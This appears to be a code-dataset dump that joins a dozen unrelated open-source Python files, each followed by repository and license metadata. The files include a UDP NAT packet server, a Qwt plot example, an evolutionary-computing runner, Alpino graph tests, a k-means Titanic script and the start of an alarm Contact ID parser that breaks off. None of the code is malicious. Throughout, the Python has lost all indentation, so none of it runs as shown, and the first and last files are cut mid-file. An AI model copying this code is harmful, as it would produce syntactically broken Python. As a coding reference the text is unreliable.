insertData(PackName, pathToManifest, db)
db.close()
if (pathToGlobalSearch) :
db = dbs.connect(pathToGlobalSearch+"/search.db")
createTable(db)
createTableUpper(db)
insertData(PackName, pathToManifest, db, zipName,versionPath, author)
db.close()
## And now ... get to work.
if __name__ == "__main__" :
path = sys.argv[1]
pack = sys.argv[2]
globalDb = None
zipName = None
versionPath = None
author = None
if len(sys.argv) > 3 :
globalDb = sys.argv[3]
if len(sys.argv) > 4 :
zipName = sys.argv[4]
if len(sys.argv) > 5 :
versionPath = sys.argv[5]
author = sys.argv[6]
main(path, pack, globalDb, zipName, versionPath, author)
| gpl-3.0 | 3,676,473,972,005,454,000 | 27.437838 | 123 | 0.657099 | false |
madformuse/server | server/natpacketserver.py | 1 | 1848 | import socket
from server.subscribable import Subscribable
from .decorators import with_logger
@with_logger
class NatPacketServer(Subscribable):
def __init__(self, loop, port):
super().__init__()
self.loop = loop
self.port = port
self._logger.debug("{id} Listening on {port}".format(id=id(self), port=port))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port))
s.setblocking(False)
loop.add_reader(s.fileno(), self._recv)
self._socket = s
self._subscribers = {}
def close(self):
self.loop.remove_reader(self._recv())
try:
self._socket.shutdown(socket.SHUT_RDWR)
except OSError as ex:
self._logger.exception(ex)
finally:
self._socket.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def _recv(self):
try:
data, addr = self._socket.recvfrom(512)
self._logger.debug("Received UDP {} from {}".format(data, addr))
if data[0] == 0x8:
self._logger.debug("Emitting with: {} {} {} ".format(data[1:].decode(),
addr[0], addr[1]))
self.notify({
'command_id': 'ProcessServerNatPacket',
'arguments': ["{}:{}".format(addr[0], addr[1]), data[1:].decode()]
})
self._socket.sendto(b"\x08OK", addr)
except OSError as ex:
if ex.errno == socket.EWOULDBLOCK:
pass
else:
self._logger.critical(ex)
raise ex
except Exception as ex:
self._logger.critical(ex)
raise ex
| gpl-3.0 | -7,447,576,450,279,924,000 | 31.421053 | 87 | 0.523268 | false |
PierreRaybaut/PythonQwt | doc/symbol_path_example.py | 1 | 1089 | from qtpy import QtWidgets as QW
from qtpy import QtGui as QG
from qtpy import QtCore as QC
import qwt
import numpy as np
import os.path as osp
app = QW.QApplication([])
# --- Construct custom symbol ---
path = QG.QPainterPath()
path.moveTo(0, 8)
path.lineTo(0, 5)
path.lineTo(-3, 5)
path.lineTo(0, 0)
path.lineTo(3, 5)
path.lineTo(0, 5)
transform = QG.QTransform()
transform.rotate(-30.0)
path = transform.map(path)
pen = QG.QPen(QC.Qt.black, 2)
pen.setJoinStyle(QC.Qt.MiterJoin)
symbol = qwt.QwtSymbol()
symbol.setPen(pen)
symbol.setBrush(QC.Qt.red)
symbol.setPath(path)
symbol.setPinPoint(QC.QPointF(0.0, 0.0))
symbol.setSize(10, 14)
# --- Test it within a simple plot ---
curve = qwt.QwtPlotCurve()
curve_pen = QG.QPen(QC.Qt.blue)
curve_pen.setStyle(QC.Qt.DotLine)
curve.setPen(curve_pen)
curve.setSymbol(symbol)
x = np.linspace(0, 10, 10)
curve.setData(x, np.sin(x))
plot = qwt.QwtPlot()
curve.attach(plot)
plot.resize(600, 300)
plot.replot()
plot.show()
plot.grab().save(
osp.join(osp.abspath(osp.dirname(__file__)), "images", "symbol_path_example.png")
)
app.exec_()
| lgpl-2.1 | -1,333,490,536,816,966,100 | 19.166667 | 85 | 0.708907 | false |
rossweinstein/Evolutionary-Computing-Python | src/main/Main.py | 1 | 1131 | from src.ecSystem.ECSystem import ECSystem
from src.ecSystem.ECSystemParameters import ECSystemParameters
# Where we actually run our EC System
params = ECSystemParameters()
# Governs the number of expressions in each generation
params.generation_size = 200
# Governs the length of the expressions in the initial population
params.genome_size = 15
# The percentage of the population selected for the next generation
params.fitness_threshold = 0.2
# If our fitness is not improving over this set number of generations, the EC System reboots
params.stagnation_threshold = 30
# The percentage of the population selected for mutation
params.mutation_percentage = .1
# Minimum fitness value required for the system to deem the expression equivalent to training data
params.success_threshold = 0.01
# Trainging Data: The x and y values used to evaluate the expression's fitness
params.x_training_data = [-55.0, -35.0, -11.0, -1.0, 1.0, 19.0, 87.0, 101.0]
params.y_training_data = [1512.0, 612.0, 60, 0.0, 0.0, 180.0, 3784, 5100.0]
ec_system = ECSystem(params)
ec_system.run_ec_system()
# System results
print(ec_system.stats)
| mit | 5,219,184,992,717,285,000 | 32.264706 | 98 | 0.769231 | false |
emsrc/daeso-dutch | test/graph/test_alpinograph.py | 1 | 3993 | """
test AlpinoGraph class
"""
import unittest
from daeso_nl.graph.alpinograph import AlpinoGraph
class Test_AlpinoGraph(unittest.TestCase):
def setUp(self):
self.ag = AlpinoGraph(root="0")
self.ag.add_node("0", "top", cat="top",
tokens="Ik wilde weten of hij echt begrip had .".split())
self.ag.add_node("1", "smain", cat="smain",
tokens="Ik wilde weten of hij echt begrip had".split())
self.ag.add_node("2", "pron", pos="pron", root="ik", index="1",
tokens="Ik".split())
self.ag.add_node("3", "verb", pos="verb", root="willen",
tokens="wilde".split())
self.ag.add_node("4", "inf", cat="inf",
tokens="weten of hij echt begrip had".split())
self.ag.add_node("5", "index", index="1")
self.ag.add_node("6", "verb", pos="verb", root="weten",
tokens="weten".split())
self.ag.add_node("7", "cp", cat="cp",
tokens="of hij echt begrip had".split())
self.ag.add_node("8", "comp", pos="comp", root="of",
tokens="of".split())
self.ag.add_node("9", "ssub", cat="ssub",
tokens="hij echt begrip had".split())
self.ag.add_node("10", "pron", pos="pron", root="hij",
tokens="hij".split())
self.ag.add_node("11", "np", cat="np",
tokens="echt begrip".split())
self.ag.add_node("12", "adj", pos="adj", root="echt",
tokens="echt".split())
self.ag.add_node("13", "noun", pos="noun", root="begrip",
tokens="begrip".split())
self.ag.add_node("14", "verb", pos="verb", root="hebben",
tokens="had".split())
self.ag.add_node("15", "punt", pos="punct", root=".",
tokens=".".split())
self.ag.add_edge("0", "1", "--")
self.ag.add_edge("1", "2", "su")
self.ag.add_edge("1", "3", "hd")
self.ag.add_edge("1", "4", "vc")
self.ag.add_edge("4", "5", "su")
self.ag.add_edge("4", "6", "hd")
self.ag.add_edge("4", "7", "vc")
self.ag.add_edge("7", "8", "cmp")
self.ag.add_edge("7", "9", "body")
self.ag.add_edge("9", "10", "su")
self.ag.add_edge("9", "11", "obj1")
self.ag.add_edge("11", "12", "mod")
self.ag.add_edge("11", "13", "hd")
self.ag.add_edge("9", "14", "hd")
self.ag.add_edge("0", "15", "punct")
def test_print_subtree(self):
print "\n", self.ag
def test_node_is_nominal(self):
self.assertTrue(self.ag.node_is_nominal("13"))
self.assertFalse(self.ag.node_is_nominal("3"))
def test_node_is_punct(self):
self.assertTrue(self.ag.node_is_punct("15"))
self.assertFalse(self.ag.node_is_punct("14"))
def test_node_is_index(self):
self.assertTrue(self.ag.node_is_index("5"))
self.assertFalse(self.ag.node_is_index("1"))
self.assertFalse(self.ag.node_is_index("2"))
def test_get_root_node(self):
self.assertEqual(self.ag.root, "0")
def test_get_parent_node(self):
self.assertEqual(self.ag.get_parent_node("0"), None)
self.assertEqual(self.ag.get_parent_node("1"), "0")
def test_get_node_deprel(self):
self.assertEqual(self.ag.get_node_deprel("0"), None)
self.assertEqual(self.ag.get_node_deprel("15"), "punct")
def test_node_is_complement(self):
self.assertTrue(self.ag.node_is_complement("11"))
self.assertFalse(self.ag.node_is_complement("12"))
if __name__ == '__main__':
import sys
sys.argv.append("-v")
unittest.main() | gpl-3.0 | 2,313,637,707,813,854,000 | 35.309091 | 82 | 0.488104 | false |
Azure/azure-sdk-for-python | sdk/formrecognizer/azure-ai-formrecognizer/tests/test_content_type.py | 1 | 2199 | # coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import pytest
from azure.ai.formrecognizer._helpers import get_content_type
from testcase import FormRecognizerTest
class TestContentType(FormRecognizerTest):
def test_pdf(self):
with open(self.invoice_pdf, "rb") as fd:
content_type = get_content_type(fd)
self.assertEqual(content_type, "application/pdf")
def test_pdf_bytes(self):
with open(self.invoice_pdf, "rb") as fd:
myfile = fd.read()
content_type = get_content_type(myfile)
self.assertEqual(content_type, "application/pdf")
def test_jpg(self):
with open(self.form_jpg, "rb") as fd:
content_type = get_content_type(fd)
self.assertEqual(content_type, "image/jpeg")
def test_jpg_bytes(self):
with open(self.form_jpg, "rb") as fd:
myfile = fd.read()
content_type = get_content_type(myfile)
self.assertEqual(content_type, "image/jpeg")
def test_png(self):
with open(self.receipt_png, "rb") as fd:
content_type = get_content_type(fd)
self.assertEqual(content_type, "image/png")
def test_png_bytes(self):
with open(self.receipt_png, "rb") as fd:
myfile = fd.read()
content_type = get_content_type(myfile)
self.assertEqual(content_type, "image/png")
def test_tiff_little_endian(self):
with open(self.invoice_tiff, "rb") as fd:
content_type = get_content_type(fd)
self.assertEqual(content_type, "image/tiff")
def test_tiff_little_endian_bytes(self):
with open(self.invoice_tiff, "rb") as fd:
myfile = fd.read()
content_type = get_content_type(myfile)
self.assertEqual(content_type, "image/tiff")
def test_tiff_big_endian(self):
content_type = get_content_type(b"\x4D\x4D\x00\x2A")
self.assertEqual(content_type, "image/tiff")
def test_bmp(self):
content_type = get_content_type(b"\x42\x4D\x00\x00")
self.assertEqual(content_type, "image/bmp")
| mit | 7,771,993,828,312,063,000 | 33.359375 | 61 | 0.606185 | false |
tung18tht/ICDAR-2017-Post-OCR-Correction | errors_detection/find_suspicious_eng_words.py | 1 | 1754 | import os, linecache, re, json
work_directory_path = os.path.dirname(os.path.realpath(__file__))
eng_words_file = open(work_directory_path + "/eng_words.txt", "rU")
eng_words = set()
for word in eng_words_file:
eng_words |= {word.rstrip()}
data_directory_path = work_directory_path + "/ICDAR2017_datasetPostOCR_Evaluation_2M_v1.2"
eng_data_directory_paths = [data_directory_path + "/eng_monograph", data_directory_path + "/eng_periodical"]
output_file = open(work_directory_path + "/Results/result_eng_words.json", "w")
output_file.write("{")
for eng_data_directory_path in eng_data_directory_paths:
for root_path, directories, files in os.walk(eng_data_directory_path):
for file in files:
if os.path.splitext(file)[1] == ".txt":
output_file.write("\n \""+os.path.basename(root_path)+"/"+file+"\": ")
errors = {}
file_path = root_path + "/" + file
ocr_output = linecache.getline(file_path, 1)[14:].strip()
word_begin_index = 0
for i, character in enumerate(ocr_output):
if character == ' ':
word_end_index = i
clean_word = re.sub('\W+', '', ocr_output[word_begin_index:word_end_index].lower())
if clean_word not in eng_words:
errors[str(word_begin_index)+":1"] = {}
word_begin_index = word_end_index + 1
clean_word = re.sub('\W+', '', ocr_output[word_begin_index:].lower())
if clean_word not in eng_words:
errors[str(word_begin_index)+":1"] = {}
output_file.write(json.dumps(errors, indent=8)+",")
output_file.seek(0, 2)
output_file.truncate(output_file.tell() - 1)
output_file = open(work_directory_path + "/Results/result_eng_words.json", "a")
output_file.write("\n}") | mit | 7,360,763,077,504,529,000 | 36.340426 | 108 | 0.622007 | false |
loli/medpy | doc/numpydoc/numpydoc/comment_eater.py | 1 | 5357 |
import sys
if sys.version_info[0] >= 3:
from io import StringIO
else:
from io import StringIO
import compiler
import inspect
import textwrap
import tokenize
from .compiler_unparse import unparse
class Comment(object):
""" A comment block.
"""
is_comment = True
def __init__(self, start_lineno, end_lineno, text):
# int : The first line number in the block. 1-indexed.
self.start_lineno = start_lineno
# int : The last line number. Inclusive!
self.end_lineno = end_lineno
# str : The text block including '#' character but not any leading spaces.
self.text = text
def add(self, string, start, end, line):
""" Add a new comment line.
"""
self.start_lineno = min(self.start_lineno, start[0])
self.end_lineno = max(self.end_lineno, end[0])
self.text += string
def __repr__(self):
return '%s(%r, %r, %r)' % (self.__class__.__name__, self.start_lineno,
self.end_lineno, self.text)
class NonComment(object):
""" A non-comment block of code.
"""
is_comment = False
def __init__(self, start_lineno, end_lineno):
self.start_lineno = start_lineno
self.end_lineno = end_lineno
def add(self, string, start, end, line):
""" Add lines to the block.
"""
if string.strip():
# Only add if not entirely whitespace.
self.start_lineno = min(self.start_lineno, start[0])
self.end_lineno = max(self.end_lineno, end[0])
def __repr__(self):
return '%s(%r, %r)' % (self.__class__.__name__, self.start_lineno,
self.end_lineno)
class CommentBlocker(object):
""" Pull out contiguous comment blocks.
"""
def __init__(self):
# Start with a dummy.
self.current_block = NonComment(0, 0)
# All of the blocks seen so far.
self.blocks = []
# The index mapping lines of code to their associated comment blocks.
self.index = {}
def process_file(self, file):
""" Process a file object.
"""
if sys.version_info[0] >= 3:
nxt = file.__next__
else:
nxt = file.__next__
for token in tokenize.generate_tokens(nxt):
self.process_token(*token)
self.make_index()
def process_token(self, kind, string, start, end, line):
""" Process a single token.
"""
if self.current_block.is_comment:
if kind == tokenize.COMMENT:
self.current_block.add(string, start, end, line)
else:
self.new_noncomment(start[0], end[0])
else:
if kind == tokenize.COMMENT:
self.new_comment(string, start, end, line)
else:
self.current_block.add(string, start, end, line)
def new_noncomment(self, start_lineno, end_lineno):
""" We are transitioning from a noncomment to a comment.
"""
block = NonComment(start_lineno, end_lineno)
self.blocks.append(block)
self.current_block = block
def new_comment(self, string, start, end, line):
""" Possibly add a new comment.
Only adds a new comment if this comment is the only thing on the line.
Otherwise, it extends the noncomment block.
"""
prefix = line[:start[1]]
if prefix.strip():
# Oops! Trailing comment, not a comment block.
self.current_block.add(string, start, end, line)
else:
# A comment block.
block = Comment(start[0], end[0], string)
self.blocks.append(block)
self.current_block = block
def make_index(self):
""" Make the index mapping lines of actual code to their associated
prefix comments.
"""
for prev, block in zip(self.blocks[:-1], self.blocks[1:]):
if not block.is_comment:
self.index[block.start_lineno] = prev
def search_for_comment(self, lineno, default=None):
""" Find the comment block just before the given line number.
Returns None (or the specified default) if there is no such block.
"""
if not self.index:
self.make_index()
block = self.index.get(lineno, None)
text = getattr(block, 'text', default)
return text
def strip_comment_marker(text):
""" Strip # markers at the front of a block of comment text.
"""
lines = []
for line in text.splitlines():
lines.append(line.lstrip('#'))
text = textwrap.dedent('\n'.join(lines))
return text
def get_class_traits(klass):
""" Yield all of the documentation for trait definitions on a class object.
"""
# FIXME: gracefully handle errors here or in the caller?
source = inspect.getsource(klass)
cb = CommentBlocker()
cb.process_file(StringIO(source))
mod_ast = compiler.parse(source)
class_ast = mod_ast.node.nodes[0]
for node in class_ast.code.nodes:
# FIXME: handle other kinds of assignments?
if isinstance(node, compiler.ast.Assign):
name = node.nodes[0].name
rhs = unparse(node.expr).strip()
doc = strip_comment_marker(cb.search_for_comment(node.lineno, default=''))
yield name, rhs, doc
| gpl-3.0 | -5,297,312,438,764,370,000 | 30.698225 | 86 | 0.581296 | false |
jeremiahyan/odoo | addons/crm_iap_lead/models/crm_iap_lead_mining_request.py | 1 | 15651 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import logging
from odoo import api, fields, models, _
from odoo.addons.iap.tools import iap_tools
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
DEFAULT_ENDPOINT = 'https://iap-services.odoo.com'
MAX_LEAD = 200
MAX_CONTACT = 5
CREDIT_PER_COMPANY = 1
CREDIT_PER_CONTACT = 1
class CRMLeadMiningRequest(models.Model):
_name = 'crm.iap.lead.mining.request'
_description = 'CRM Lead Mining Request'
def _default_lead_type(self):
if self.env.user.has_group('crm.group_use_lead'):
return 'lead'
else:
return 'opportunity'
def _default_country_ids(self):
return self.env.user.company_id.country_id
name = fields.Char(string='Request Number', required=True, readonly=True, default=lambda self: _('New'), copy=False)
state = fields.Selection([('draft', 'Draft'), ('error', 'Error'), ('done', 'Done')], string='Status', required=True, default='draft')
# Request Data
lead_number = fields.Integer(string='Number of Leads', required=True, default=3)
search_type = fields.Selection([('companies', 'Companies'), ('people', 'Companies and their Contacts')], string='Target', required=True, default='companies')
error_type = fields.Selection([
('credits', 'Insufficient Credits'),
('no_result', 'No Result'),
], string='Error Type', readonly=True)
# Lead / Opportunity Data
lead_type = fields.Selection([('lead', 'Leads'), ('opportunity', 'Opportunities')], string='Type', required=True, default=_default_lead_type)
display_lead_label = fields.Char(compute='_compute_display_lead_label')
team_id = fields.Many2one(
'crm.team', string='Sales Team', ondelete="set null",
domain="[('use_opportunities', '=', True)]", readonly=False, compute='_compute_team_id', store=True)
user_id = fields.Many2one('res.users', string='Salesperson', default=lambda self: self.env.user)
tag_ids = fields.Many2many('crm.tag', string='Tags')
lead_ids = fields.One2many('crm.lead', 'lead_mining_request_id', string='Generated Lead / Opportunity')
lead_count = fields.Integer(compute='_compute_lead_count', string='Number of Generated Leads')
# Company Criteria Filter
filter_on_size = fields.Boolean(string='Filter on Size', default=False)
company_size_min = fields.Integer(string='Size', default=1)
company_size_max = fields.Integer(default=1000)
country_ids = fields.Many2many('res.country', string='Countries', default=_default_country_ids)
state_ids = fields.Many2many('res.country.state', string='States')
available_state_ids = fields.One2many('res.country.state', compute='_compute_available_state_ids',
help="List of available states based on selected countries")
industry_ids = fields.Many2many('crm.iap.lead.industry', string='Industries')
# Contact Generation Filter
contact_number = fields.Integer(string='Number of Contacts', default=10)
contact_filter_type = fields.Selection([('role', 'Role'), ('seniority', 'Seniority')], string='Filter on', default='role')
preferred_role_id = fields.Many2one('crm.iap.lead.role', string='Preferred Role')
role_ids = fields.Many2many('crm.iap.lead.role', string='Other Roles')
seniority_id = fields.Many2one('crm.iap.lead.seniority', string='Seniority')
# Fields for the blue tooltip
lead_credits = fields.Char(compute='_compute_tooltip', readonly=True)
lead_contacts_credits = fields.Char(compute='_compute_tooltip', readonly=True)
lead_total_credits = fields.Char(compute='_compute_tooltip', readonly=True)
@api.depends('lead_type', 'lead_number')
def _compute_display_lead_label(self):
selection_description_values = {
e[0]: e[1] for e in self._fields['lead_type']._description_selection(self.env)}
for request in self:
lead_type = selection_description_values[request.lead_type]
request.display_lead_label = '%s %s' % (request.lead_number, lead_type)
@api.onchange('lead_number', 'contact_number')
def _compute_tooltip(self):
for record in self:
company_credits = CREDIT_PER_COMPANY * record.lead_number
contact_credits = CREDIT_PER_CONTACT * record.contact_number
total_contact_credits = contact_credits * record.lead_number
record.lead_contacts_credits = _("Up to %d additional credits will be consumed to identify %d contacts per company.") % (contact_credits*company_credits, record.contact_number)
record.lead_credits = _('%d credits will be consumed to find %d companies.') % (company_credits, record.lead_number)
record.lead_total_credits = _("This makes a total of %d credits for this request.") % (total_contact_credits + company_credits)
@api.depends('lead_ids.lead_mining_request_id')
def _compute_lead_count(self):
if self.ids:
leads_data = self.env['crm.lead'].read_group(
[('lead_mining_request_id', 'in', self.ids)],
['lead_mining_request_id'], ['lead_mining_request_id'])
else:
leads_data = []
mapped_data = dict(
(m['lead_mining_request_id'][0], m['lead_mining_request_id_count'])
for m in leads_data)
for request in self:
request.lead_count = mapped_data.get(request.id, 0)
@api.depends('user_id', 'lead_type')
def _compute_team_id(self):
""" When changing the user, also set a team_id or restrict team id
to the ones user_id is member of. """
for mining in self:
# setting user as void should not trigger a new team computation
if not mining.user_id:
continue
user = mining.user_id
if mining.team_id and user in mining.team_id.member_ids | mining.team_id.user_id:
continue
team_domain = [('use_leads', '=', True)] if mining.lead_type == 'lead' else [('use_opportunities', '=', True)]
team = self.env['crm.team']._get_default_team_id(user_id=user.id, domain=team_domain)
mining.team_id = team.id
@api.depends('country_ids')
def _compute_available_state_ids(self):
""" States for some specific countries should not be offered as filtering options because
they drastically reduce the amount of IAP reveal results.
For example, in Belgium, only 11% of companies have a defined state within the
reveal service while the rest of them have no state defined at all.
Meaning specifying states for that country will yield a lot less results than what you could
expect, which is not the desired behavior.
Obviously all companies are active within a state, it's just a lack of data in the reveal
service side.
To help users create meaningful iap searches, we only keep the states filtering for several
whitelisted countries (based on their country code).
The complete list and reasons for this change can be found on task-2471703. """
for lead_mining_request in self:
countries = lead_mining_request.country_ids.filtered(lambda country:
country.code in iap_tools._STATES_FILTER_COUNTRIES_WHITELIST)
lead_mining_request.available_state_ids = self.env['res.country.state'].search([
('country_id', 'in', countries.ids)
])
@api.onchange('available_state_ids')
def _onchange_available_state_ids(self):
self.state_ids -= self.state_ids.filtered(
lambda state: (state._origin.id or state.id) not in self.available_state_ids.ids
)
@api.onchange('lead_number')
def _onchange_lead_number(self):
if self.lead_number <= 0:
self.lead_number = 1
elif self.lead_number > MAX_LEAD:
self.lead_number = MAX_LEAD
@api.onchange('contact_number')
def _onchange_contact_number(self):
if self.contact_number <= 0:
self.contact_number = 1
elif self.contact_number > MAX_CONTACT:
self.contact_number = MAX_CONTACT
@api.onchange('country_ids')
def _onchange_country_ids(self):
self.state_ids = []
@api.onchange('company_size_min')
def _onchange_company_size_min(self):
if self.company_size_min <= 0:
self.company_size_min = 1
elif self.company_size_min > self.company_size_max:
self.company_size_min = self.company_size_max
@api.onchange('company_size_max')
def _onchange_company_size_max(self):
if self.company_size_max < self.company_size_min:
self.company_size_max = self.company_size_min
def _prepare_iap_payload(self):
"""
This will prepare the data to send to the server
"""
self.ensure_one()
payload = {'lead_number': self.lead_number,
'search_type': self.search_type,
'countries': self.country_ids.mapped('code')}
if self.state_ids:
payload['states'] = self.state_ids.mapped('code')
if self.filter_on_size:
payload.update({'company_size_min': self.company_size_min,
'company_size_max': self.company_size_max})
if self.industry_ids:
# accumulate all reveal_ids (separated by ',') into one list
# eg: 3 records with values: "175,176", "177" and "190,191"
# will become ['175','176','177','190','191']
all_industry_ids = [
reveal_id.strip()
for reveal_ids in self.mapped('industry_ids.reveal_ids')
for reveal_id in reveal_ids.split(',')
]
payload['industry_ids'] = all_industry_ids
if self.search_type == 'people':
payload.update({'contact_number': self.contact_number,
'contact_filter_type': self.contact_filter_type})
if self.contact_filter_type == 'role':
payload.update({'preferred_role': self.preferred_role_id.reveal_id,
'other_roles': self.role_ids.mapped('reveal_id')})
elif self.contact_filter_type == 'seniority':
payload['seniority'] = self.seniority_id.reveal_id
return payload
def _perform_request(self):
"""
This will perform the request and create the corresponding leads.
The user will be notified if he hasn't enough credits.
"""
self.error_type = False
server_payload = self._prepare_iap_payload()
reveal_account = self.env['iap.account'].get('reveal')
dbuuid = self.env['ir.config_parameter'].sudo().get_param('database.uuid')
endpoint = self.env['ir.config_parameter'].sudo().get_param('reveal.endpoint', DEFAULT_ENDPOINT) + '/iap/clearbit/1/lead_mining_request'
params = {
'account_token': reveal_account.account_token,
'dbuuid': dbuuid,
'data': server_payload
}
try:
response = iap_tools.iap_jsonrpc(endpoint, params=params, timeout=300)
if not response.get('data'):
self.error_type = 'no_result'
return False
return response['data']
except iap_tools.InsufficientCreditError as e:
self.error_type = 'credits'
self.state = 'error'
return False
except Exception as e:
raise UserError(_("Your request could not be executed: %s", e))
def _create_leads_from_response(self, result):
""" This method will get the response from the service and create the leads accordingly """
self.ensure_one()
lead_vals_list = []
messages_to_post = {}
for data in result:
lead_vals_list.append(self._lead_vals_from_response(data))
template_values = data['company_data']
template_values.update({
'flavor_text': _("Opportunity created by Odoo Lead Generation"),
'people_data': data.get('people_data'),
})
messages_to_post[data['company_data']['clearbit_id']] = template_values
leads = self.env['crm.lead'].create(lead_vals_list)
for lead in leads:
if messages_to_post.get(lead.reveal_id):
lead.message_post_with_view('iap_mail.enrich_company', values=messages_to_post[lead.reveal_id], subtype_id=self.env.ref('mail.mt_note').id)
# Methods responsible for format response data into valid odoo lead data
@api.model
def _lead_vals_from_response(self, data):
self.ensure_one()
company_data = data.get('company_data')
people_data = data.get('people_data')
lead_vals = self.env['crm.iap.lead.helpers'].lead_vals_from_response(self.lead_type, self.team_id.id, self.tag_ids.ids, self.user_id.id, company_data, people_data)
lead_vals['lead_mining_request_id'] = self.id
return lead_vals
@api.model
def get_empty_list_help(self, help):
help_title = _('Create a Lead Mining Request')
sub_title = _('Generate new leads based on their country, industry, size, etc.')
return '<p class="o_view_nocontent_smiling_face">%s</p><p class="oe_view_nocontent_alias">%s</p>' % (help_title, sub_title)
def action_draft(self):
self.ensure_one()
self.name = _('New')
self.state = 'draft'
def action_submit(self):
self.ensure_one()
if self.name == _('New'):
self.name = self.env['ir.sequence'].next_by_code('crm.iap.lead.mining.request') or _('New')
results = self._perform_request()
if results:
self._create_leads_from_response(results)
self.state = 'done'
if self.lead_type == 'lead':
return self.action_get_lead_action()
elif self.lead_type == 'opportunity':
return self.action_get_opportunity_action()
elif self.env.context.get('is_modal'):
# when we are inside a modal already, we re-open the same record
# that way, the form view is updated and the correct error message appears
# (sadly, there is no way to simply 'reload' a form view within a modal)
return {
'name': _('Generate Leads'),
'res_model': 'crm.iap.lead.mining.request',
'views': [[False, 'form']],
'target': 'new',
'type': 'ir.actions.act_window',
'res_id': self.id,
'context': dict(self.env.context, edit=True, form_view_initial_mode='edit')
}
else:
# will reload the form view and show the error message on top
return False
def action_get_lead_action(self):
self.ensure_one()
action = self.env["ir.actions.actions"]._for_xml_id("crm.crm_lead_all_leads")
action['domain'] = [('id', 'in', self.lead_ids.ids), ('type', '=', 'lead')]
return action
def action_get_opportunity_action(self):
self.ensure_one()
action = self.env["ir.actions.actions"]._for_xml_id("crm.crm_lead_opportunities")
action['domain'] = [('id', 'in', self.lead_ids.ids), ('type', '=', 'opportunity')]
return action
def action_buy_credits(self):
return {
'type': 'ir.actions.act_url',
'url': self.env['iap.account'].get_credits_url(service_name='reveal'),
}
| gpl-3.0 | 4,967,390,844,346,431,000 | 45.580357 | 188 | 0.615104 | false |
bstrebel/PyUtils | test/test_options.py | 1 | 2293 | import os, sys, logging, logging.config, pyutils
from pyutils import Options, LogAdapter, get_logger, log_level
def main():
from ConfigParser import ConfigParser
from argparse import ArgumentParser
options = {
'option': 'OPTION',
'secrets': {'token': 'secret'},
'loglevel': 'INFO'
}
# region Command line arguments
parser = ArgumentParser(description='PySnc Engine Rev. 0.1 (c) Bernd Strebel')
parser.add_argument('-c', '--config', type=str, help='use alternate configuration file')
parser.add_argument('-l', '--loglevel', type=str,
choices=['DEBUG', 'INFO', 'WARN', 'WARNING', 'ERROR', 'CRITICAL',
'debug', 'info', 'warn', 'warning', 'error', 'critical'],
help='debug log level')
args = parser.parse_args()
opts = Options(options, args, config=True)
# _logger = get_logger('root',log_level(opts.loglevel))
# logger = LogAdapter(_logger, {'package': 'init'})
# logger.info("Console logger initilized")
# endregion
# region (I) Basic configuration and logger settings from config file
# if opts.config_file:
# if os.path.isfile(opts.config_file):
# logging.config.fileConfig(opts.config_file)
# config = ConfigParser(options)
# config.read(opts.config_file)
# else:
# logger.critical('Configuration file %s not found!' % (opts.config_file))
# exit(1)
# else:
# logger.critical("Missing configuration file!")
# exit(1)
#
# _logger = logging.getLogger()
# _logger.setLevel(log_level(opts.loglevel))
#
# logger = LogAdapter(_logger, {'package': 'main'})
# endregion
# region (II) Basic configuration and logger settings from config parser
config = opts.config_parser
logger = LogAdapter(opts.logger, {'package': 'main'})
# endregion
logger.info('Default logger configured from %s' % (opts.config_file))
print opts.option
s = opts.get('string_option', False)
t = opts['secrets']['token']
e = opts['empty']
b = opts.get('uni')
u = opts['uni']
pass
#f = Options.get_bool_value(opt)
# region __Main__
if __name__ == '__main__':
main()
exit(0)
# endregion
| gpl-2.0 | -958,336,599,769,721,000 | 26.626506 | 92 | 0.598779 | false |
Rocamadour7/ml_tutorial | 05. Clustering/titanic-data-example.py | 1 | 1721 | import numpy as np
from sklearn.cluster import KMeans
from sklearn import preprocessing
import pandas as pd
'''
Pclass Passenger Class (1 = 1st; 2 = 2nd; 3 = 3rd)
survival Survival (0 = No; 1 = Yes)
name Name
sex Sex
age Age
sibsp Number of Siblings/Spouses Aboard
parch Number of Parents/Children Aboard
ticket Ticket Number
fare Passenger Fare (British pound)
cabin Cabin
embarked Port of Embarkation (C = Cherbourg; Q = Queenstown; S = Southampton)
boat Lifeboat
body Body Identification Number
home.dest Home/Destination
'''
df = pd.read_excel('titanic.xls')
df.drop(['body', 'name'], 1, inplace=True)
df.fillna(0, inplace=True)
def handle_non_numerical_data(df):
columns = df.columns.values
for column in columns:
text_digit_vals = {}
def convert_to_int(val):
return text_digit_vals[val]
if df[column].dtype != np.int64 and df[column].dtype != np.float64:
column_contents = df[column].values.tolist()
unique_elements = set(column_contents)
x = 0
for unique in unique_elements:
if unique not in text_digit_vals:
text_digit_vals[unique] = x
x += 1
df[column] = list(map(convert_to_int, df[column]))
return df
df = handle_non_numerical_data(df)
X = np.array(df.drop(['survived'], 1).astype(float))
X = preprocessing.scale(X)
y = np.array(df['survived'])
clf = KMeans(n_clusters=2)
clf.fit(X)
correct = 0
for i in range(len(X)):
predict_me = np.array(X[i].astype(float))
predict_me = predict_me.reshape(-1, len(predict_me))
prediction = clf.predict(predict_me)
if prediction[0] == y[i]:
correct += 1
print(correct/len(X))
| mit | 7,085,823,906,355,869,000 | 26.31746 | 77 | 0.646717 | false |
scudre/alarm-central-station-receiver | alarm_central_station_receiver/contact_id/callup.py | 1 | 3225 | """
Copyright (2018) Chris Scuderi
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import re
from alarm_central_station_receiver.contact_id import handshake
def calc_checksum(code):
checksum = 0
for digit in code:
# 0 is treated as 10 in the checksum calculation
checksum += int(digit, 16) if digit != '0' else 10
return checksum % 15
def parse_alarm_codes(code_str):
pattern = "([0-9]{4}18[136][0-9abcdef]{8}[0-9abcdef]?(?![0-9]{3}18[136]))"
codes = []
for code in re.split(pattern, code_str):
if not code:
continue
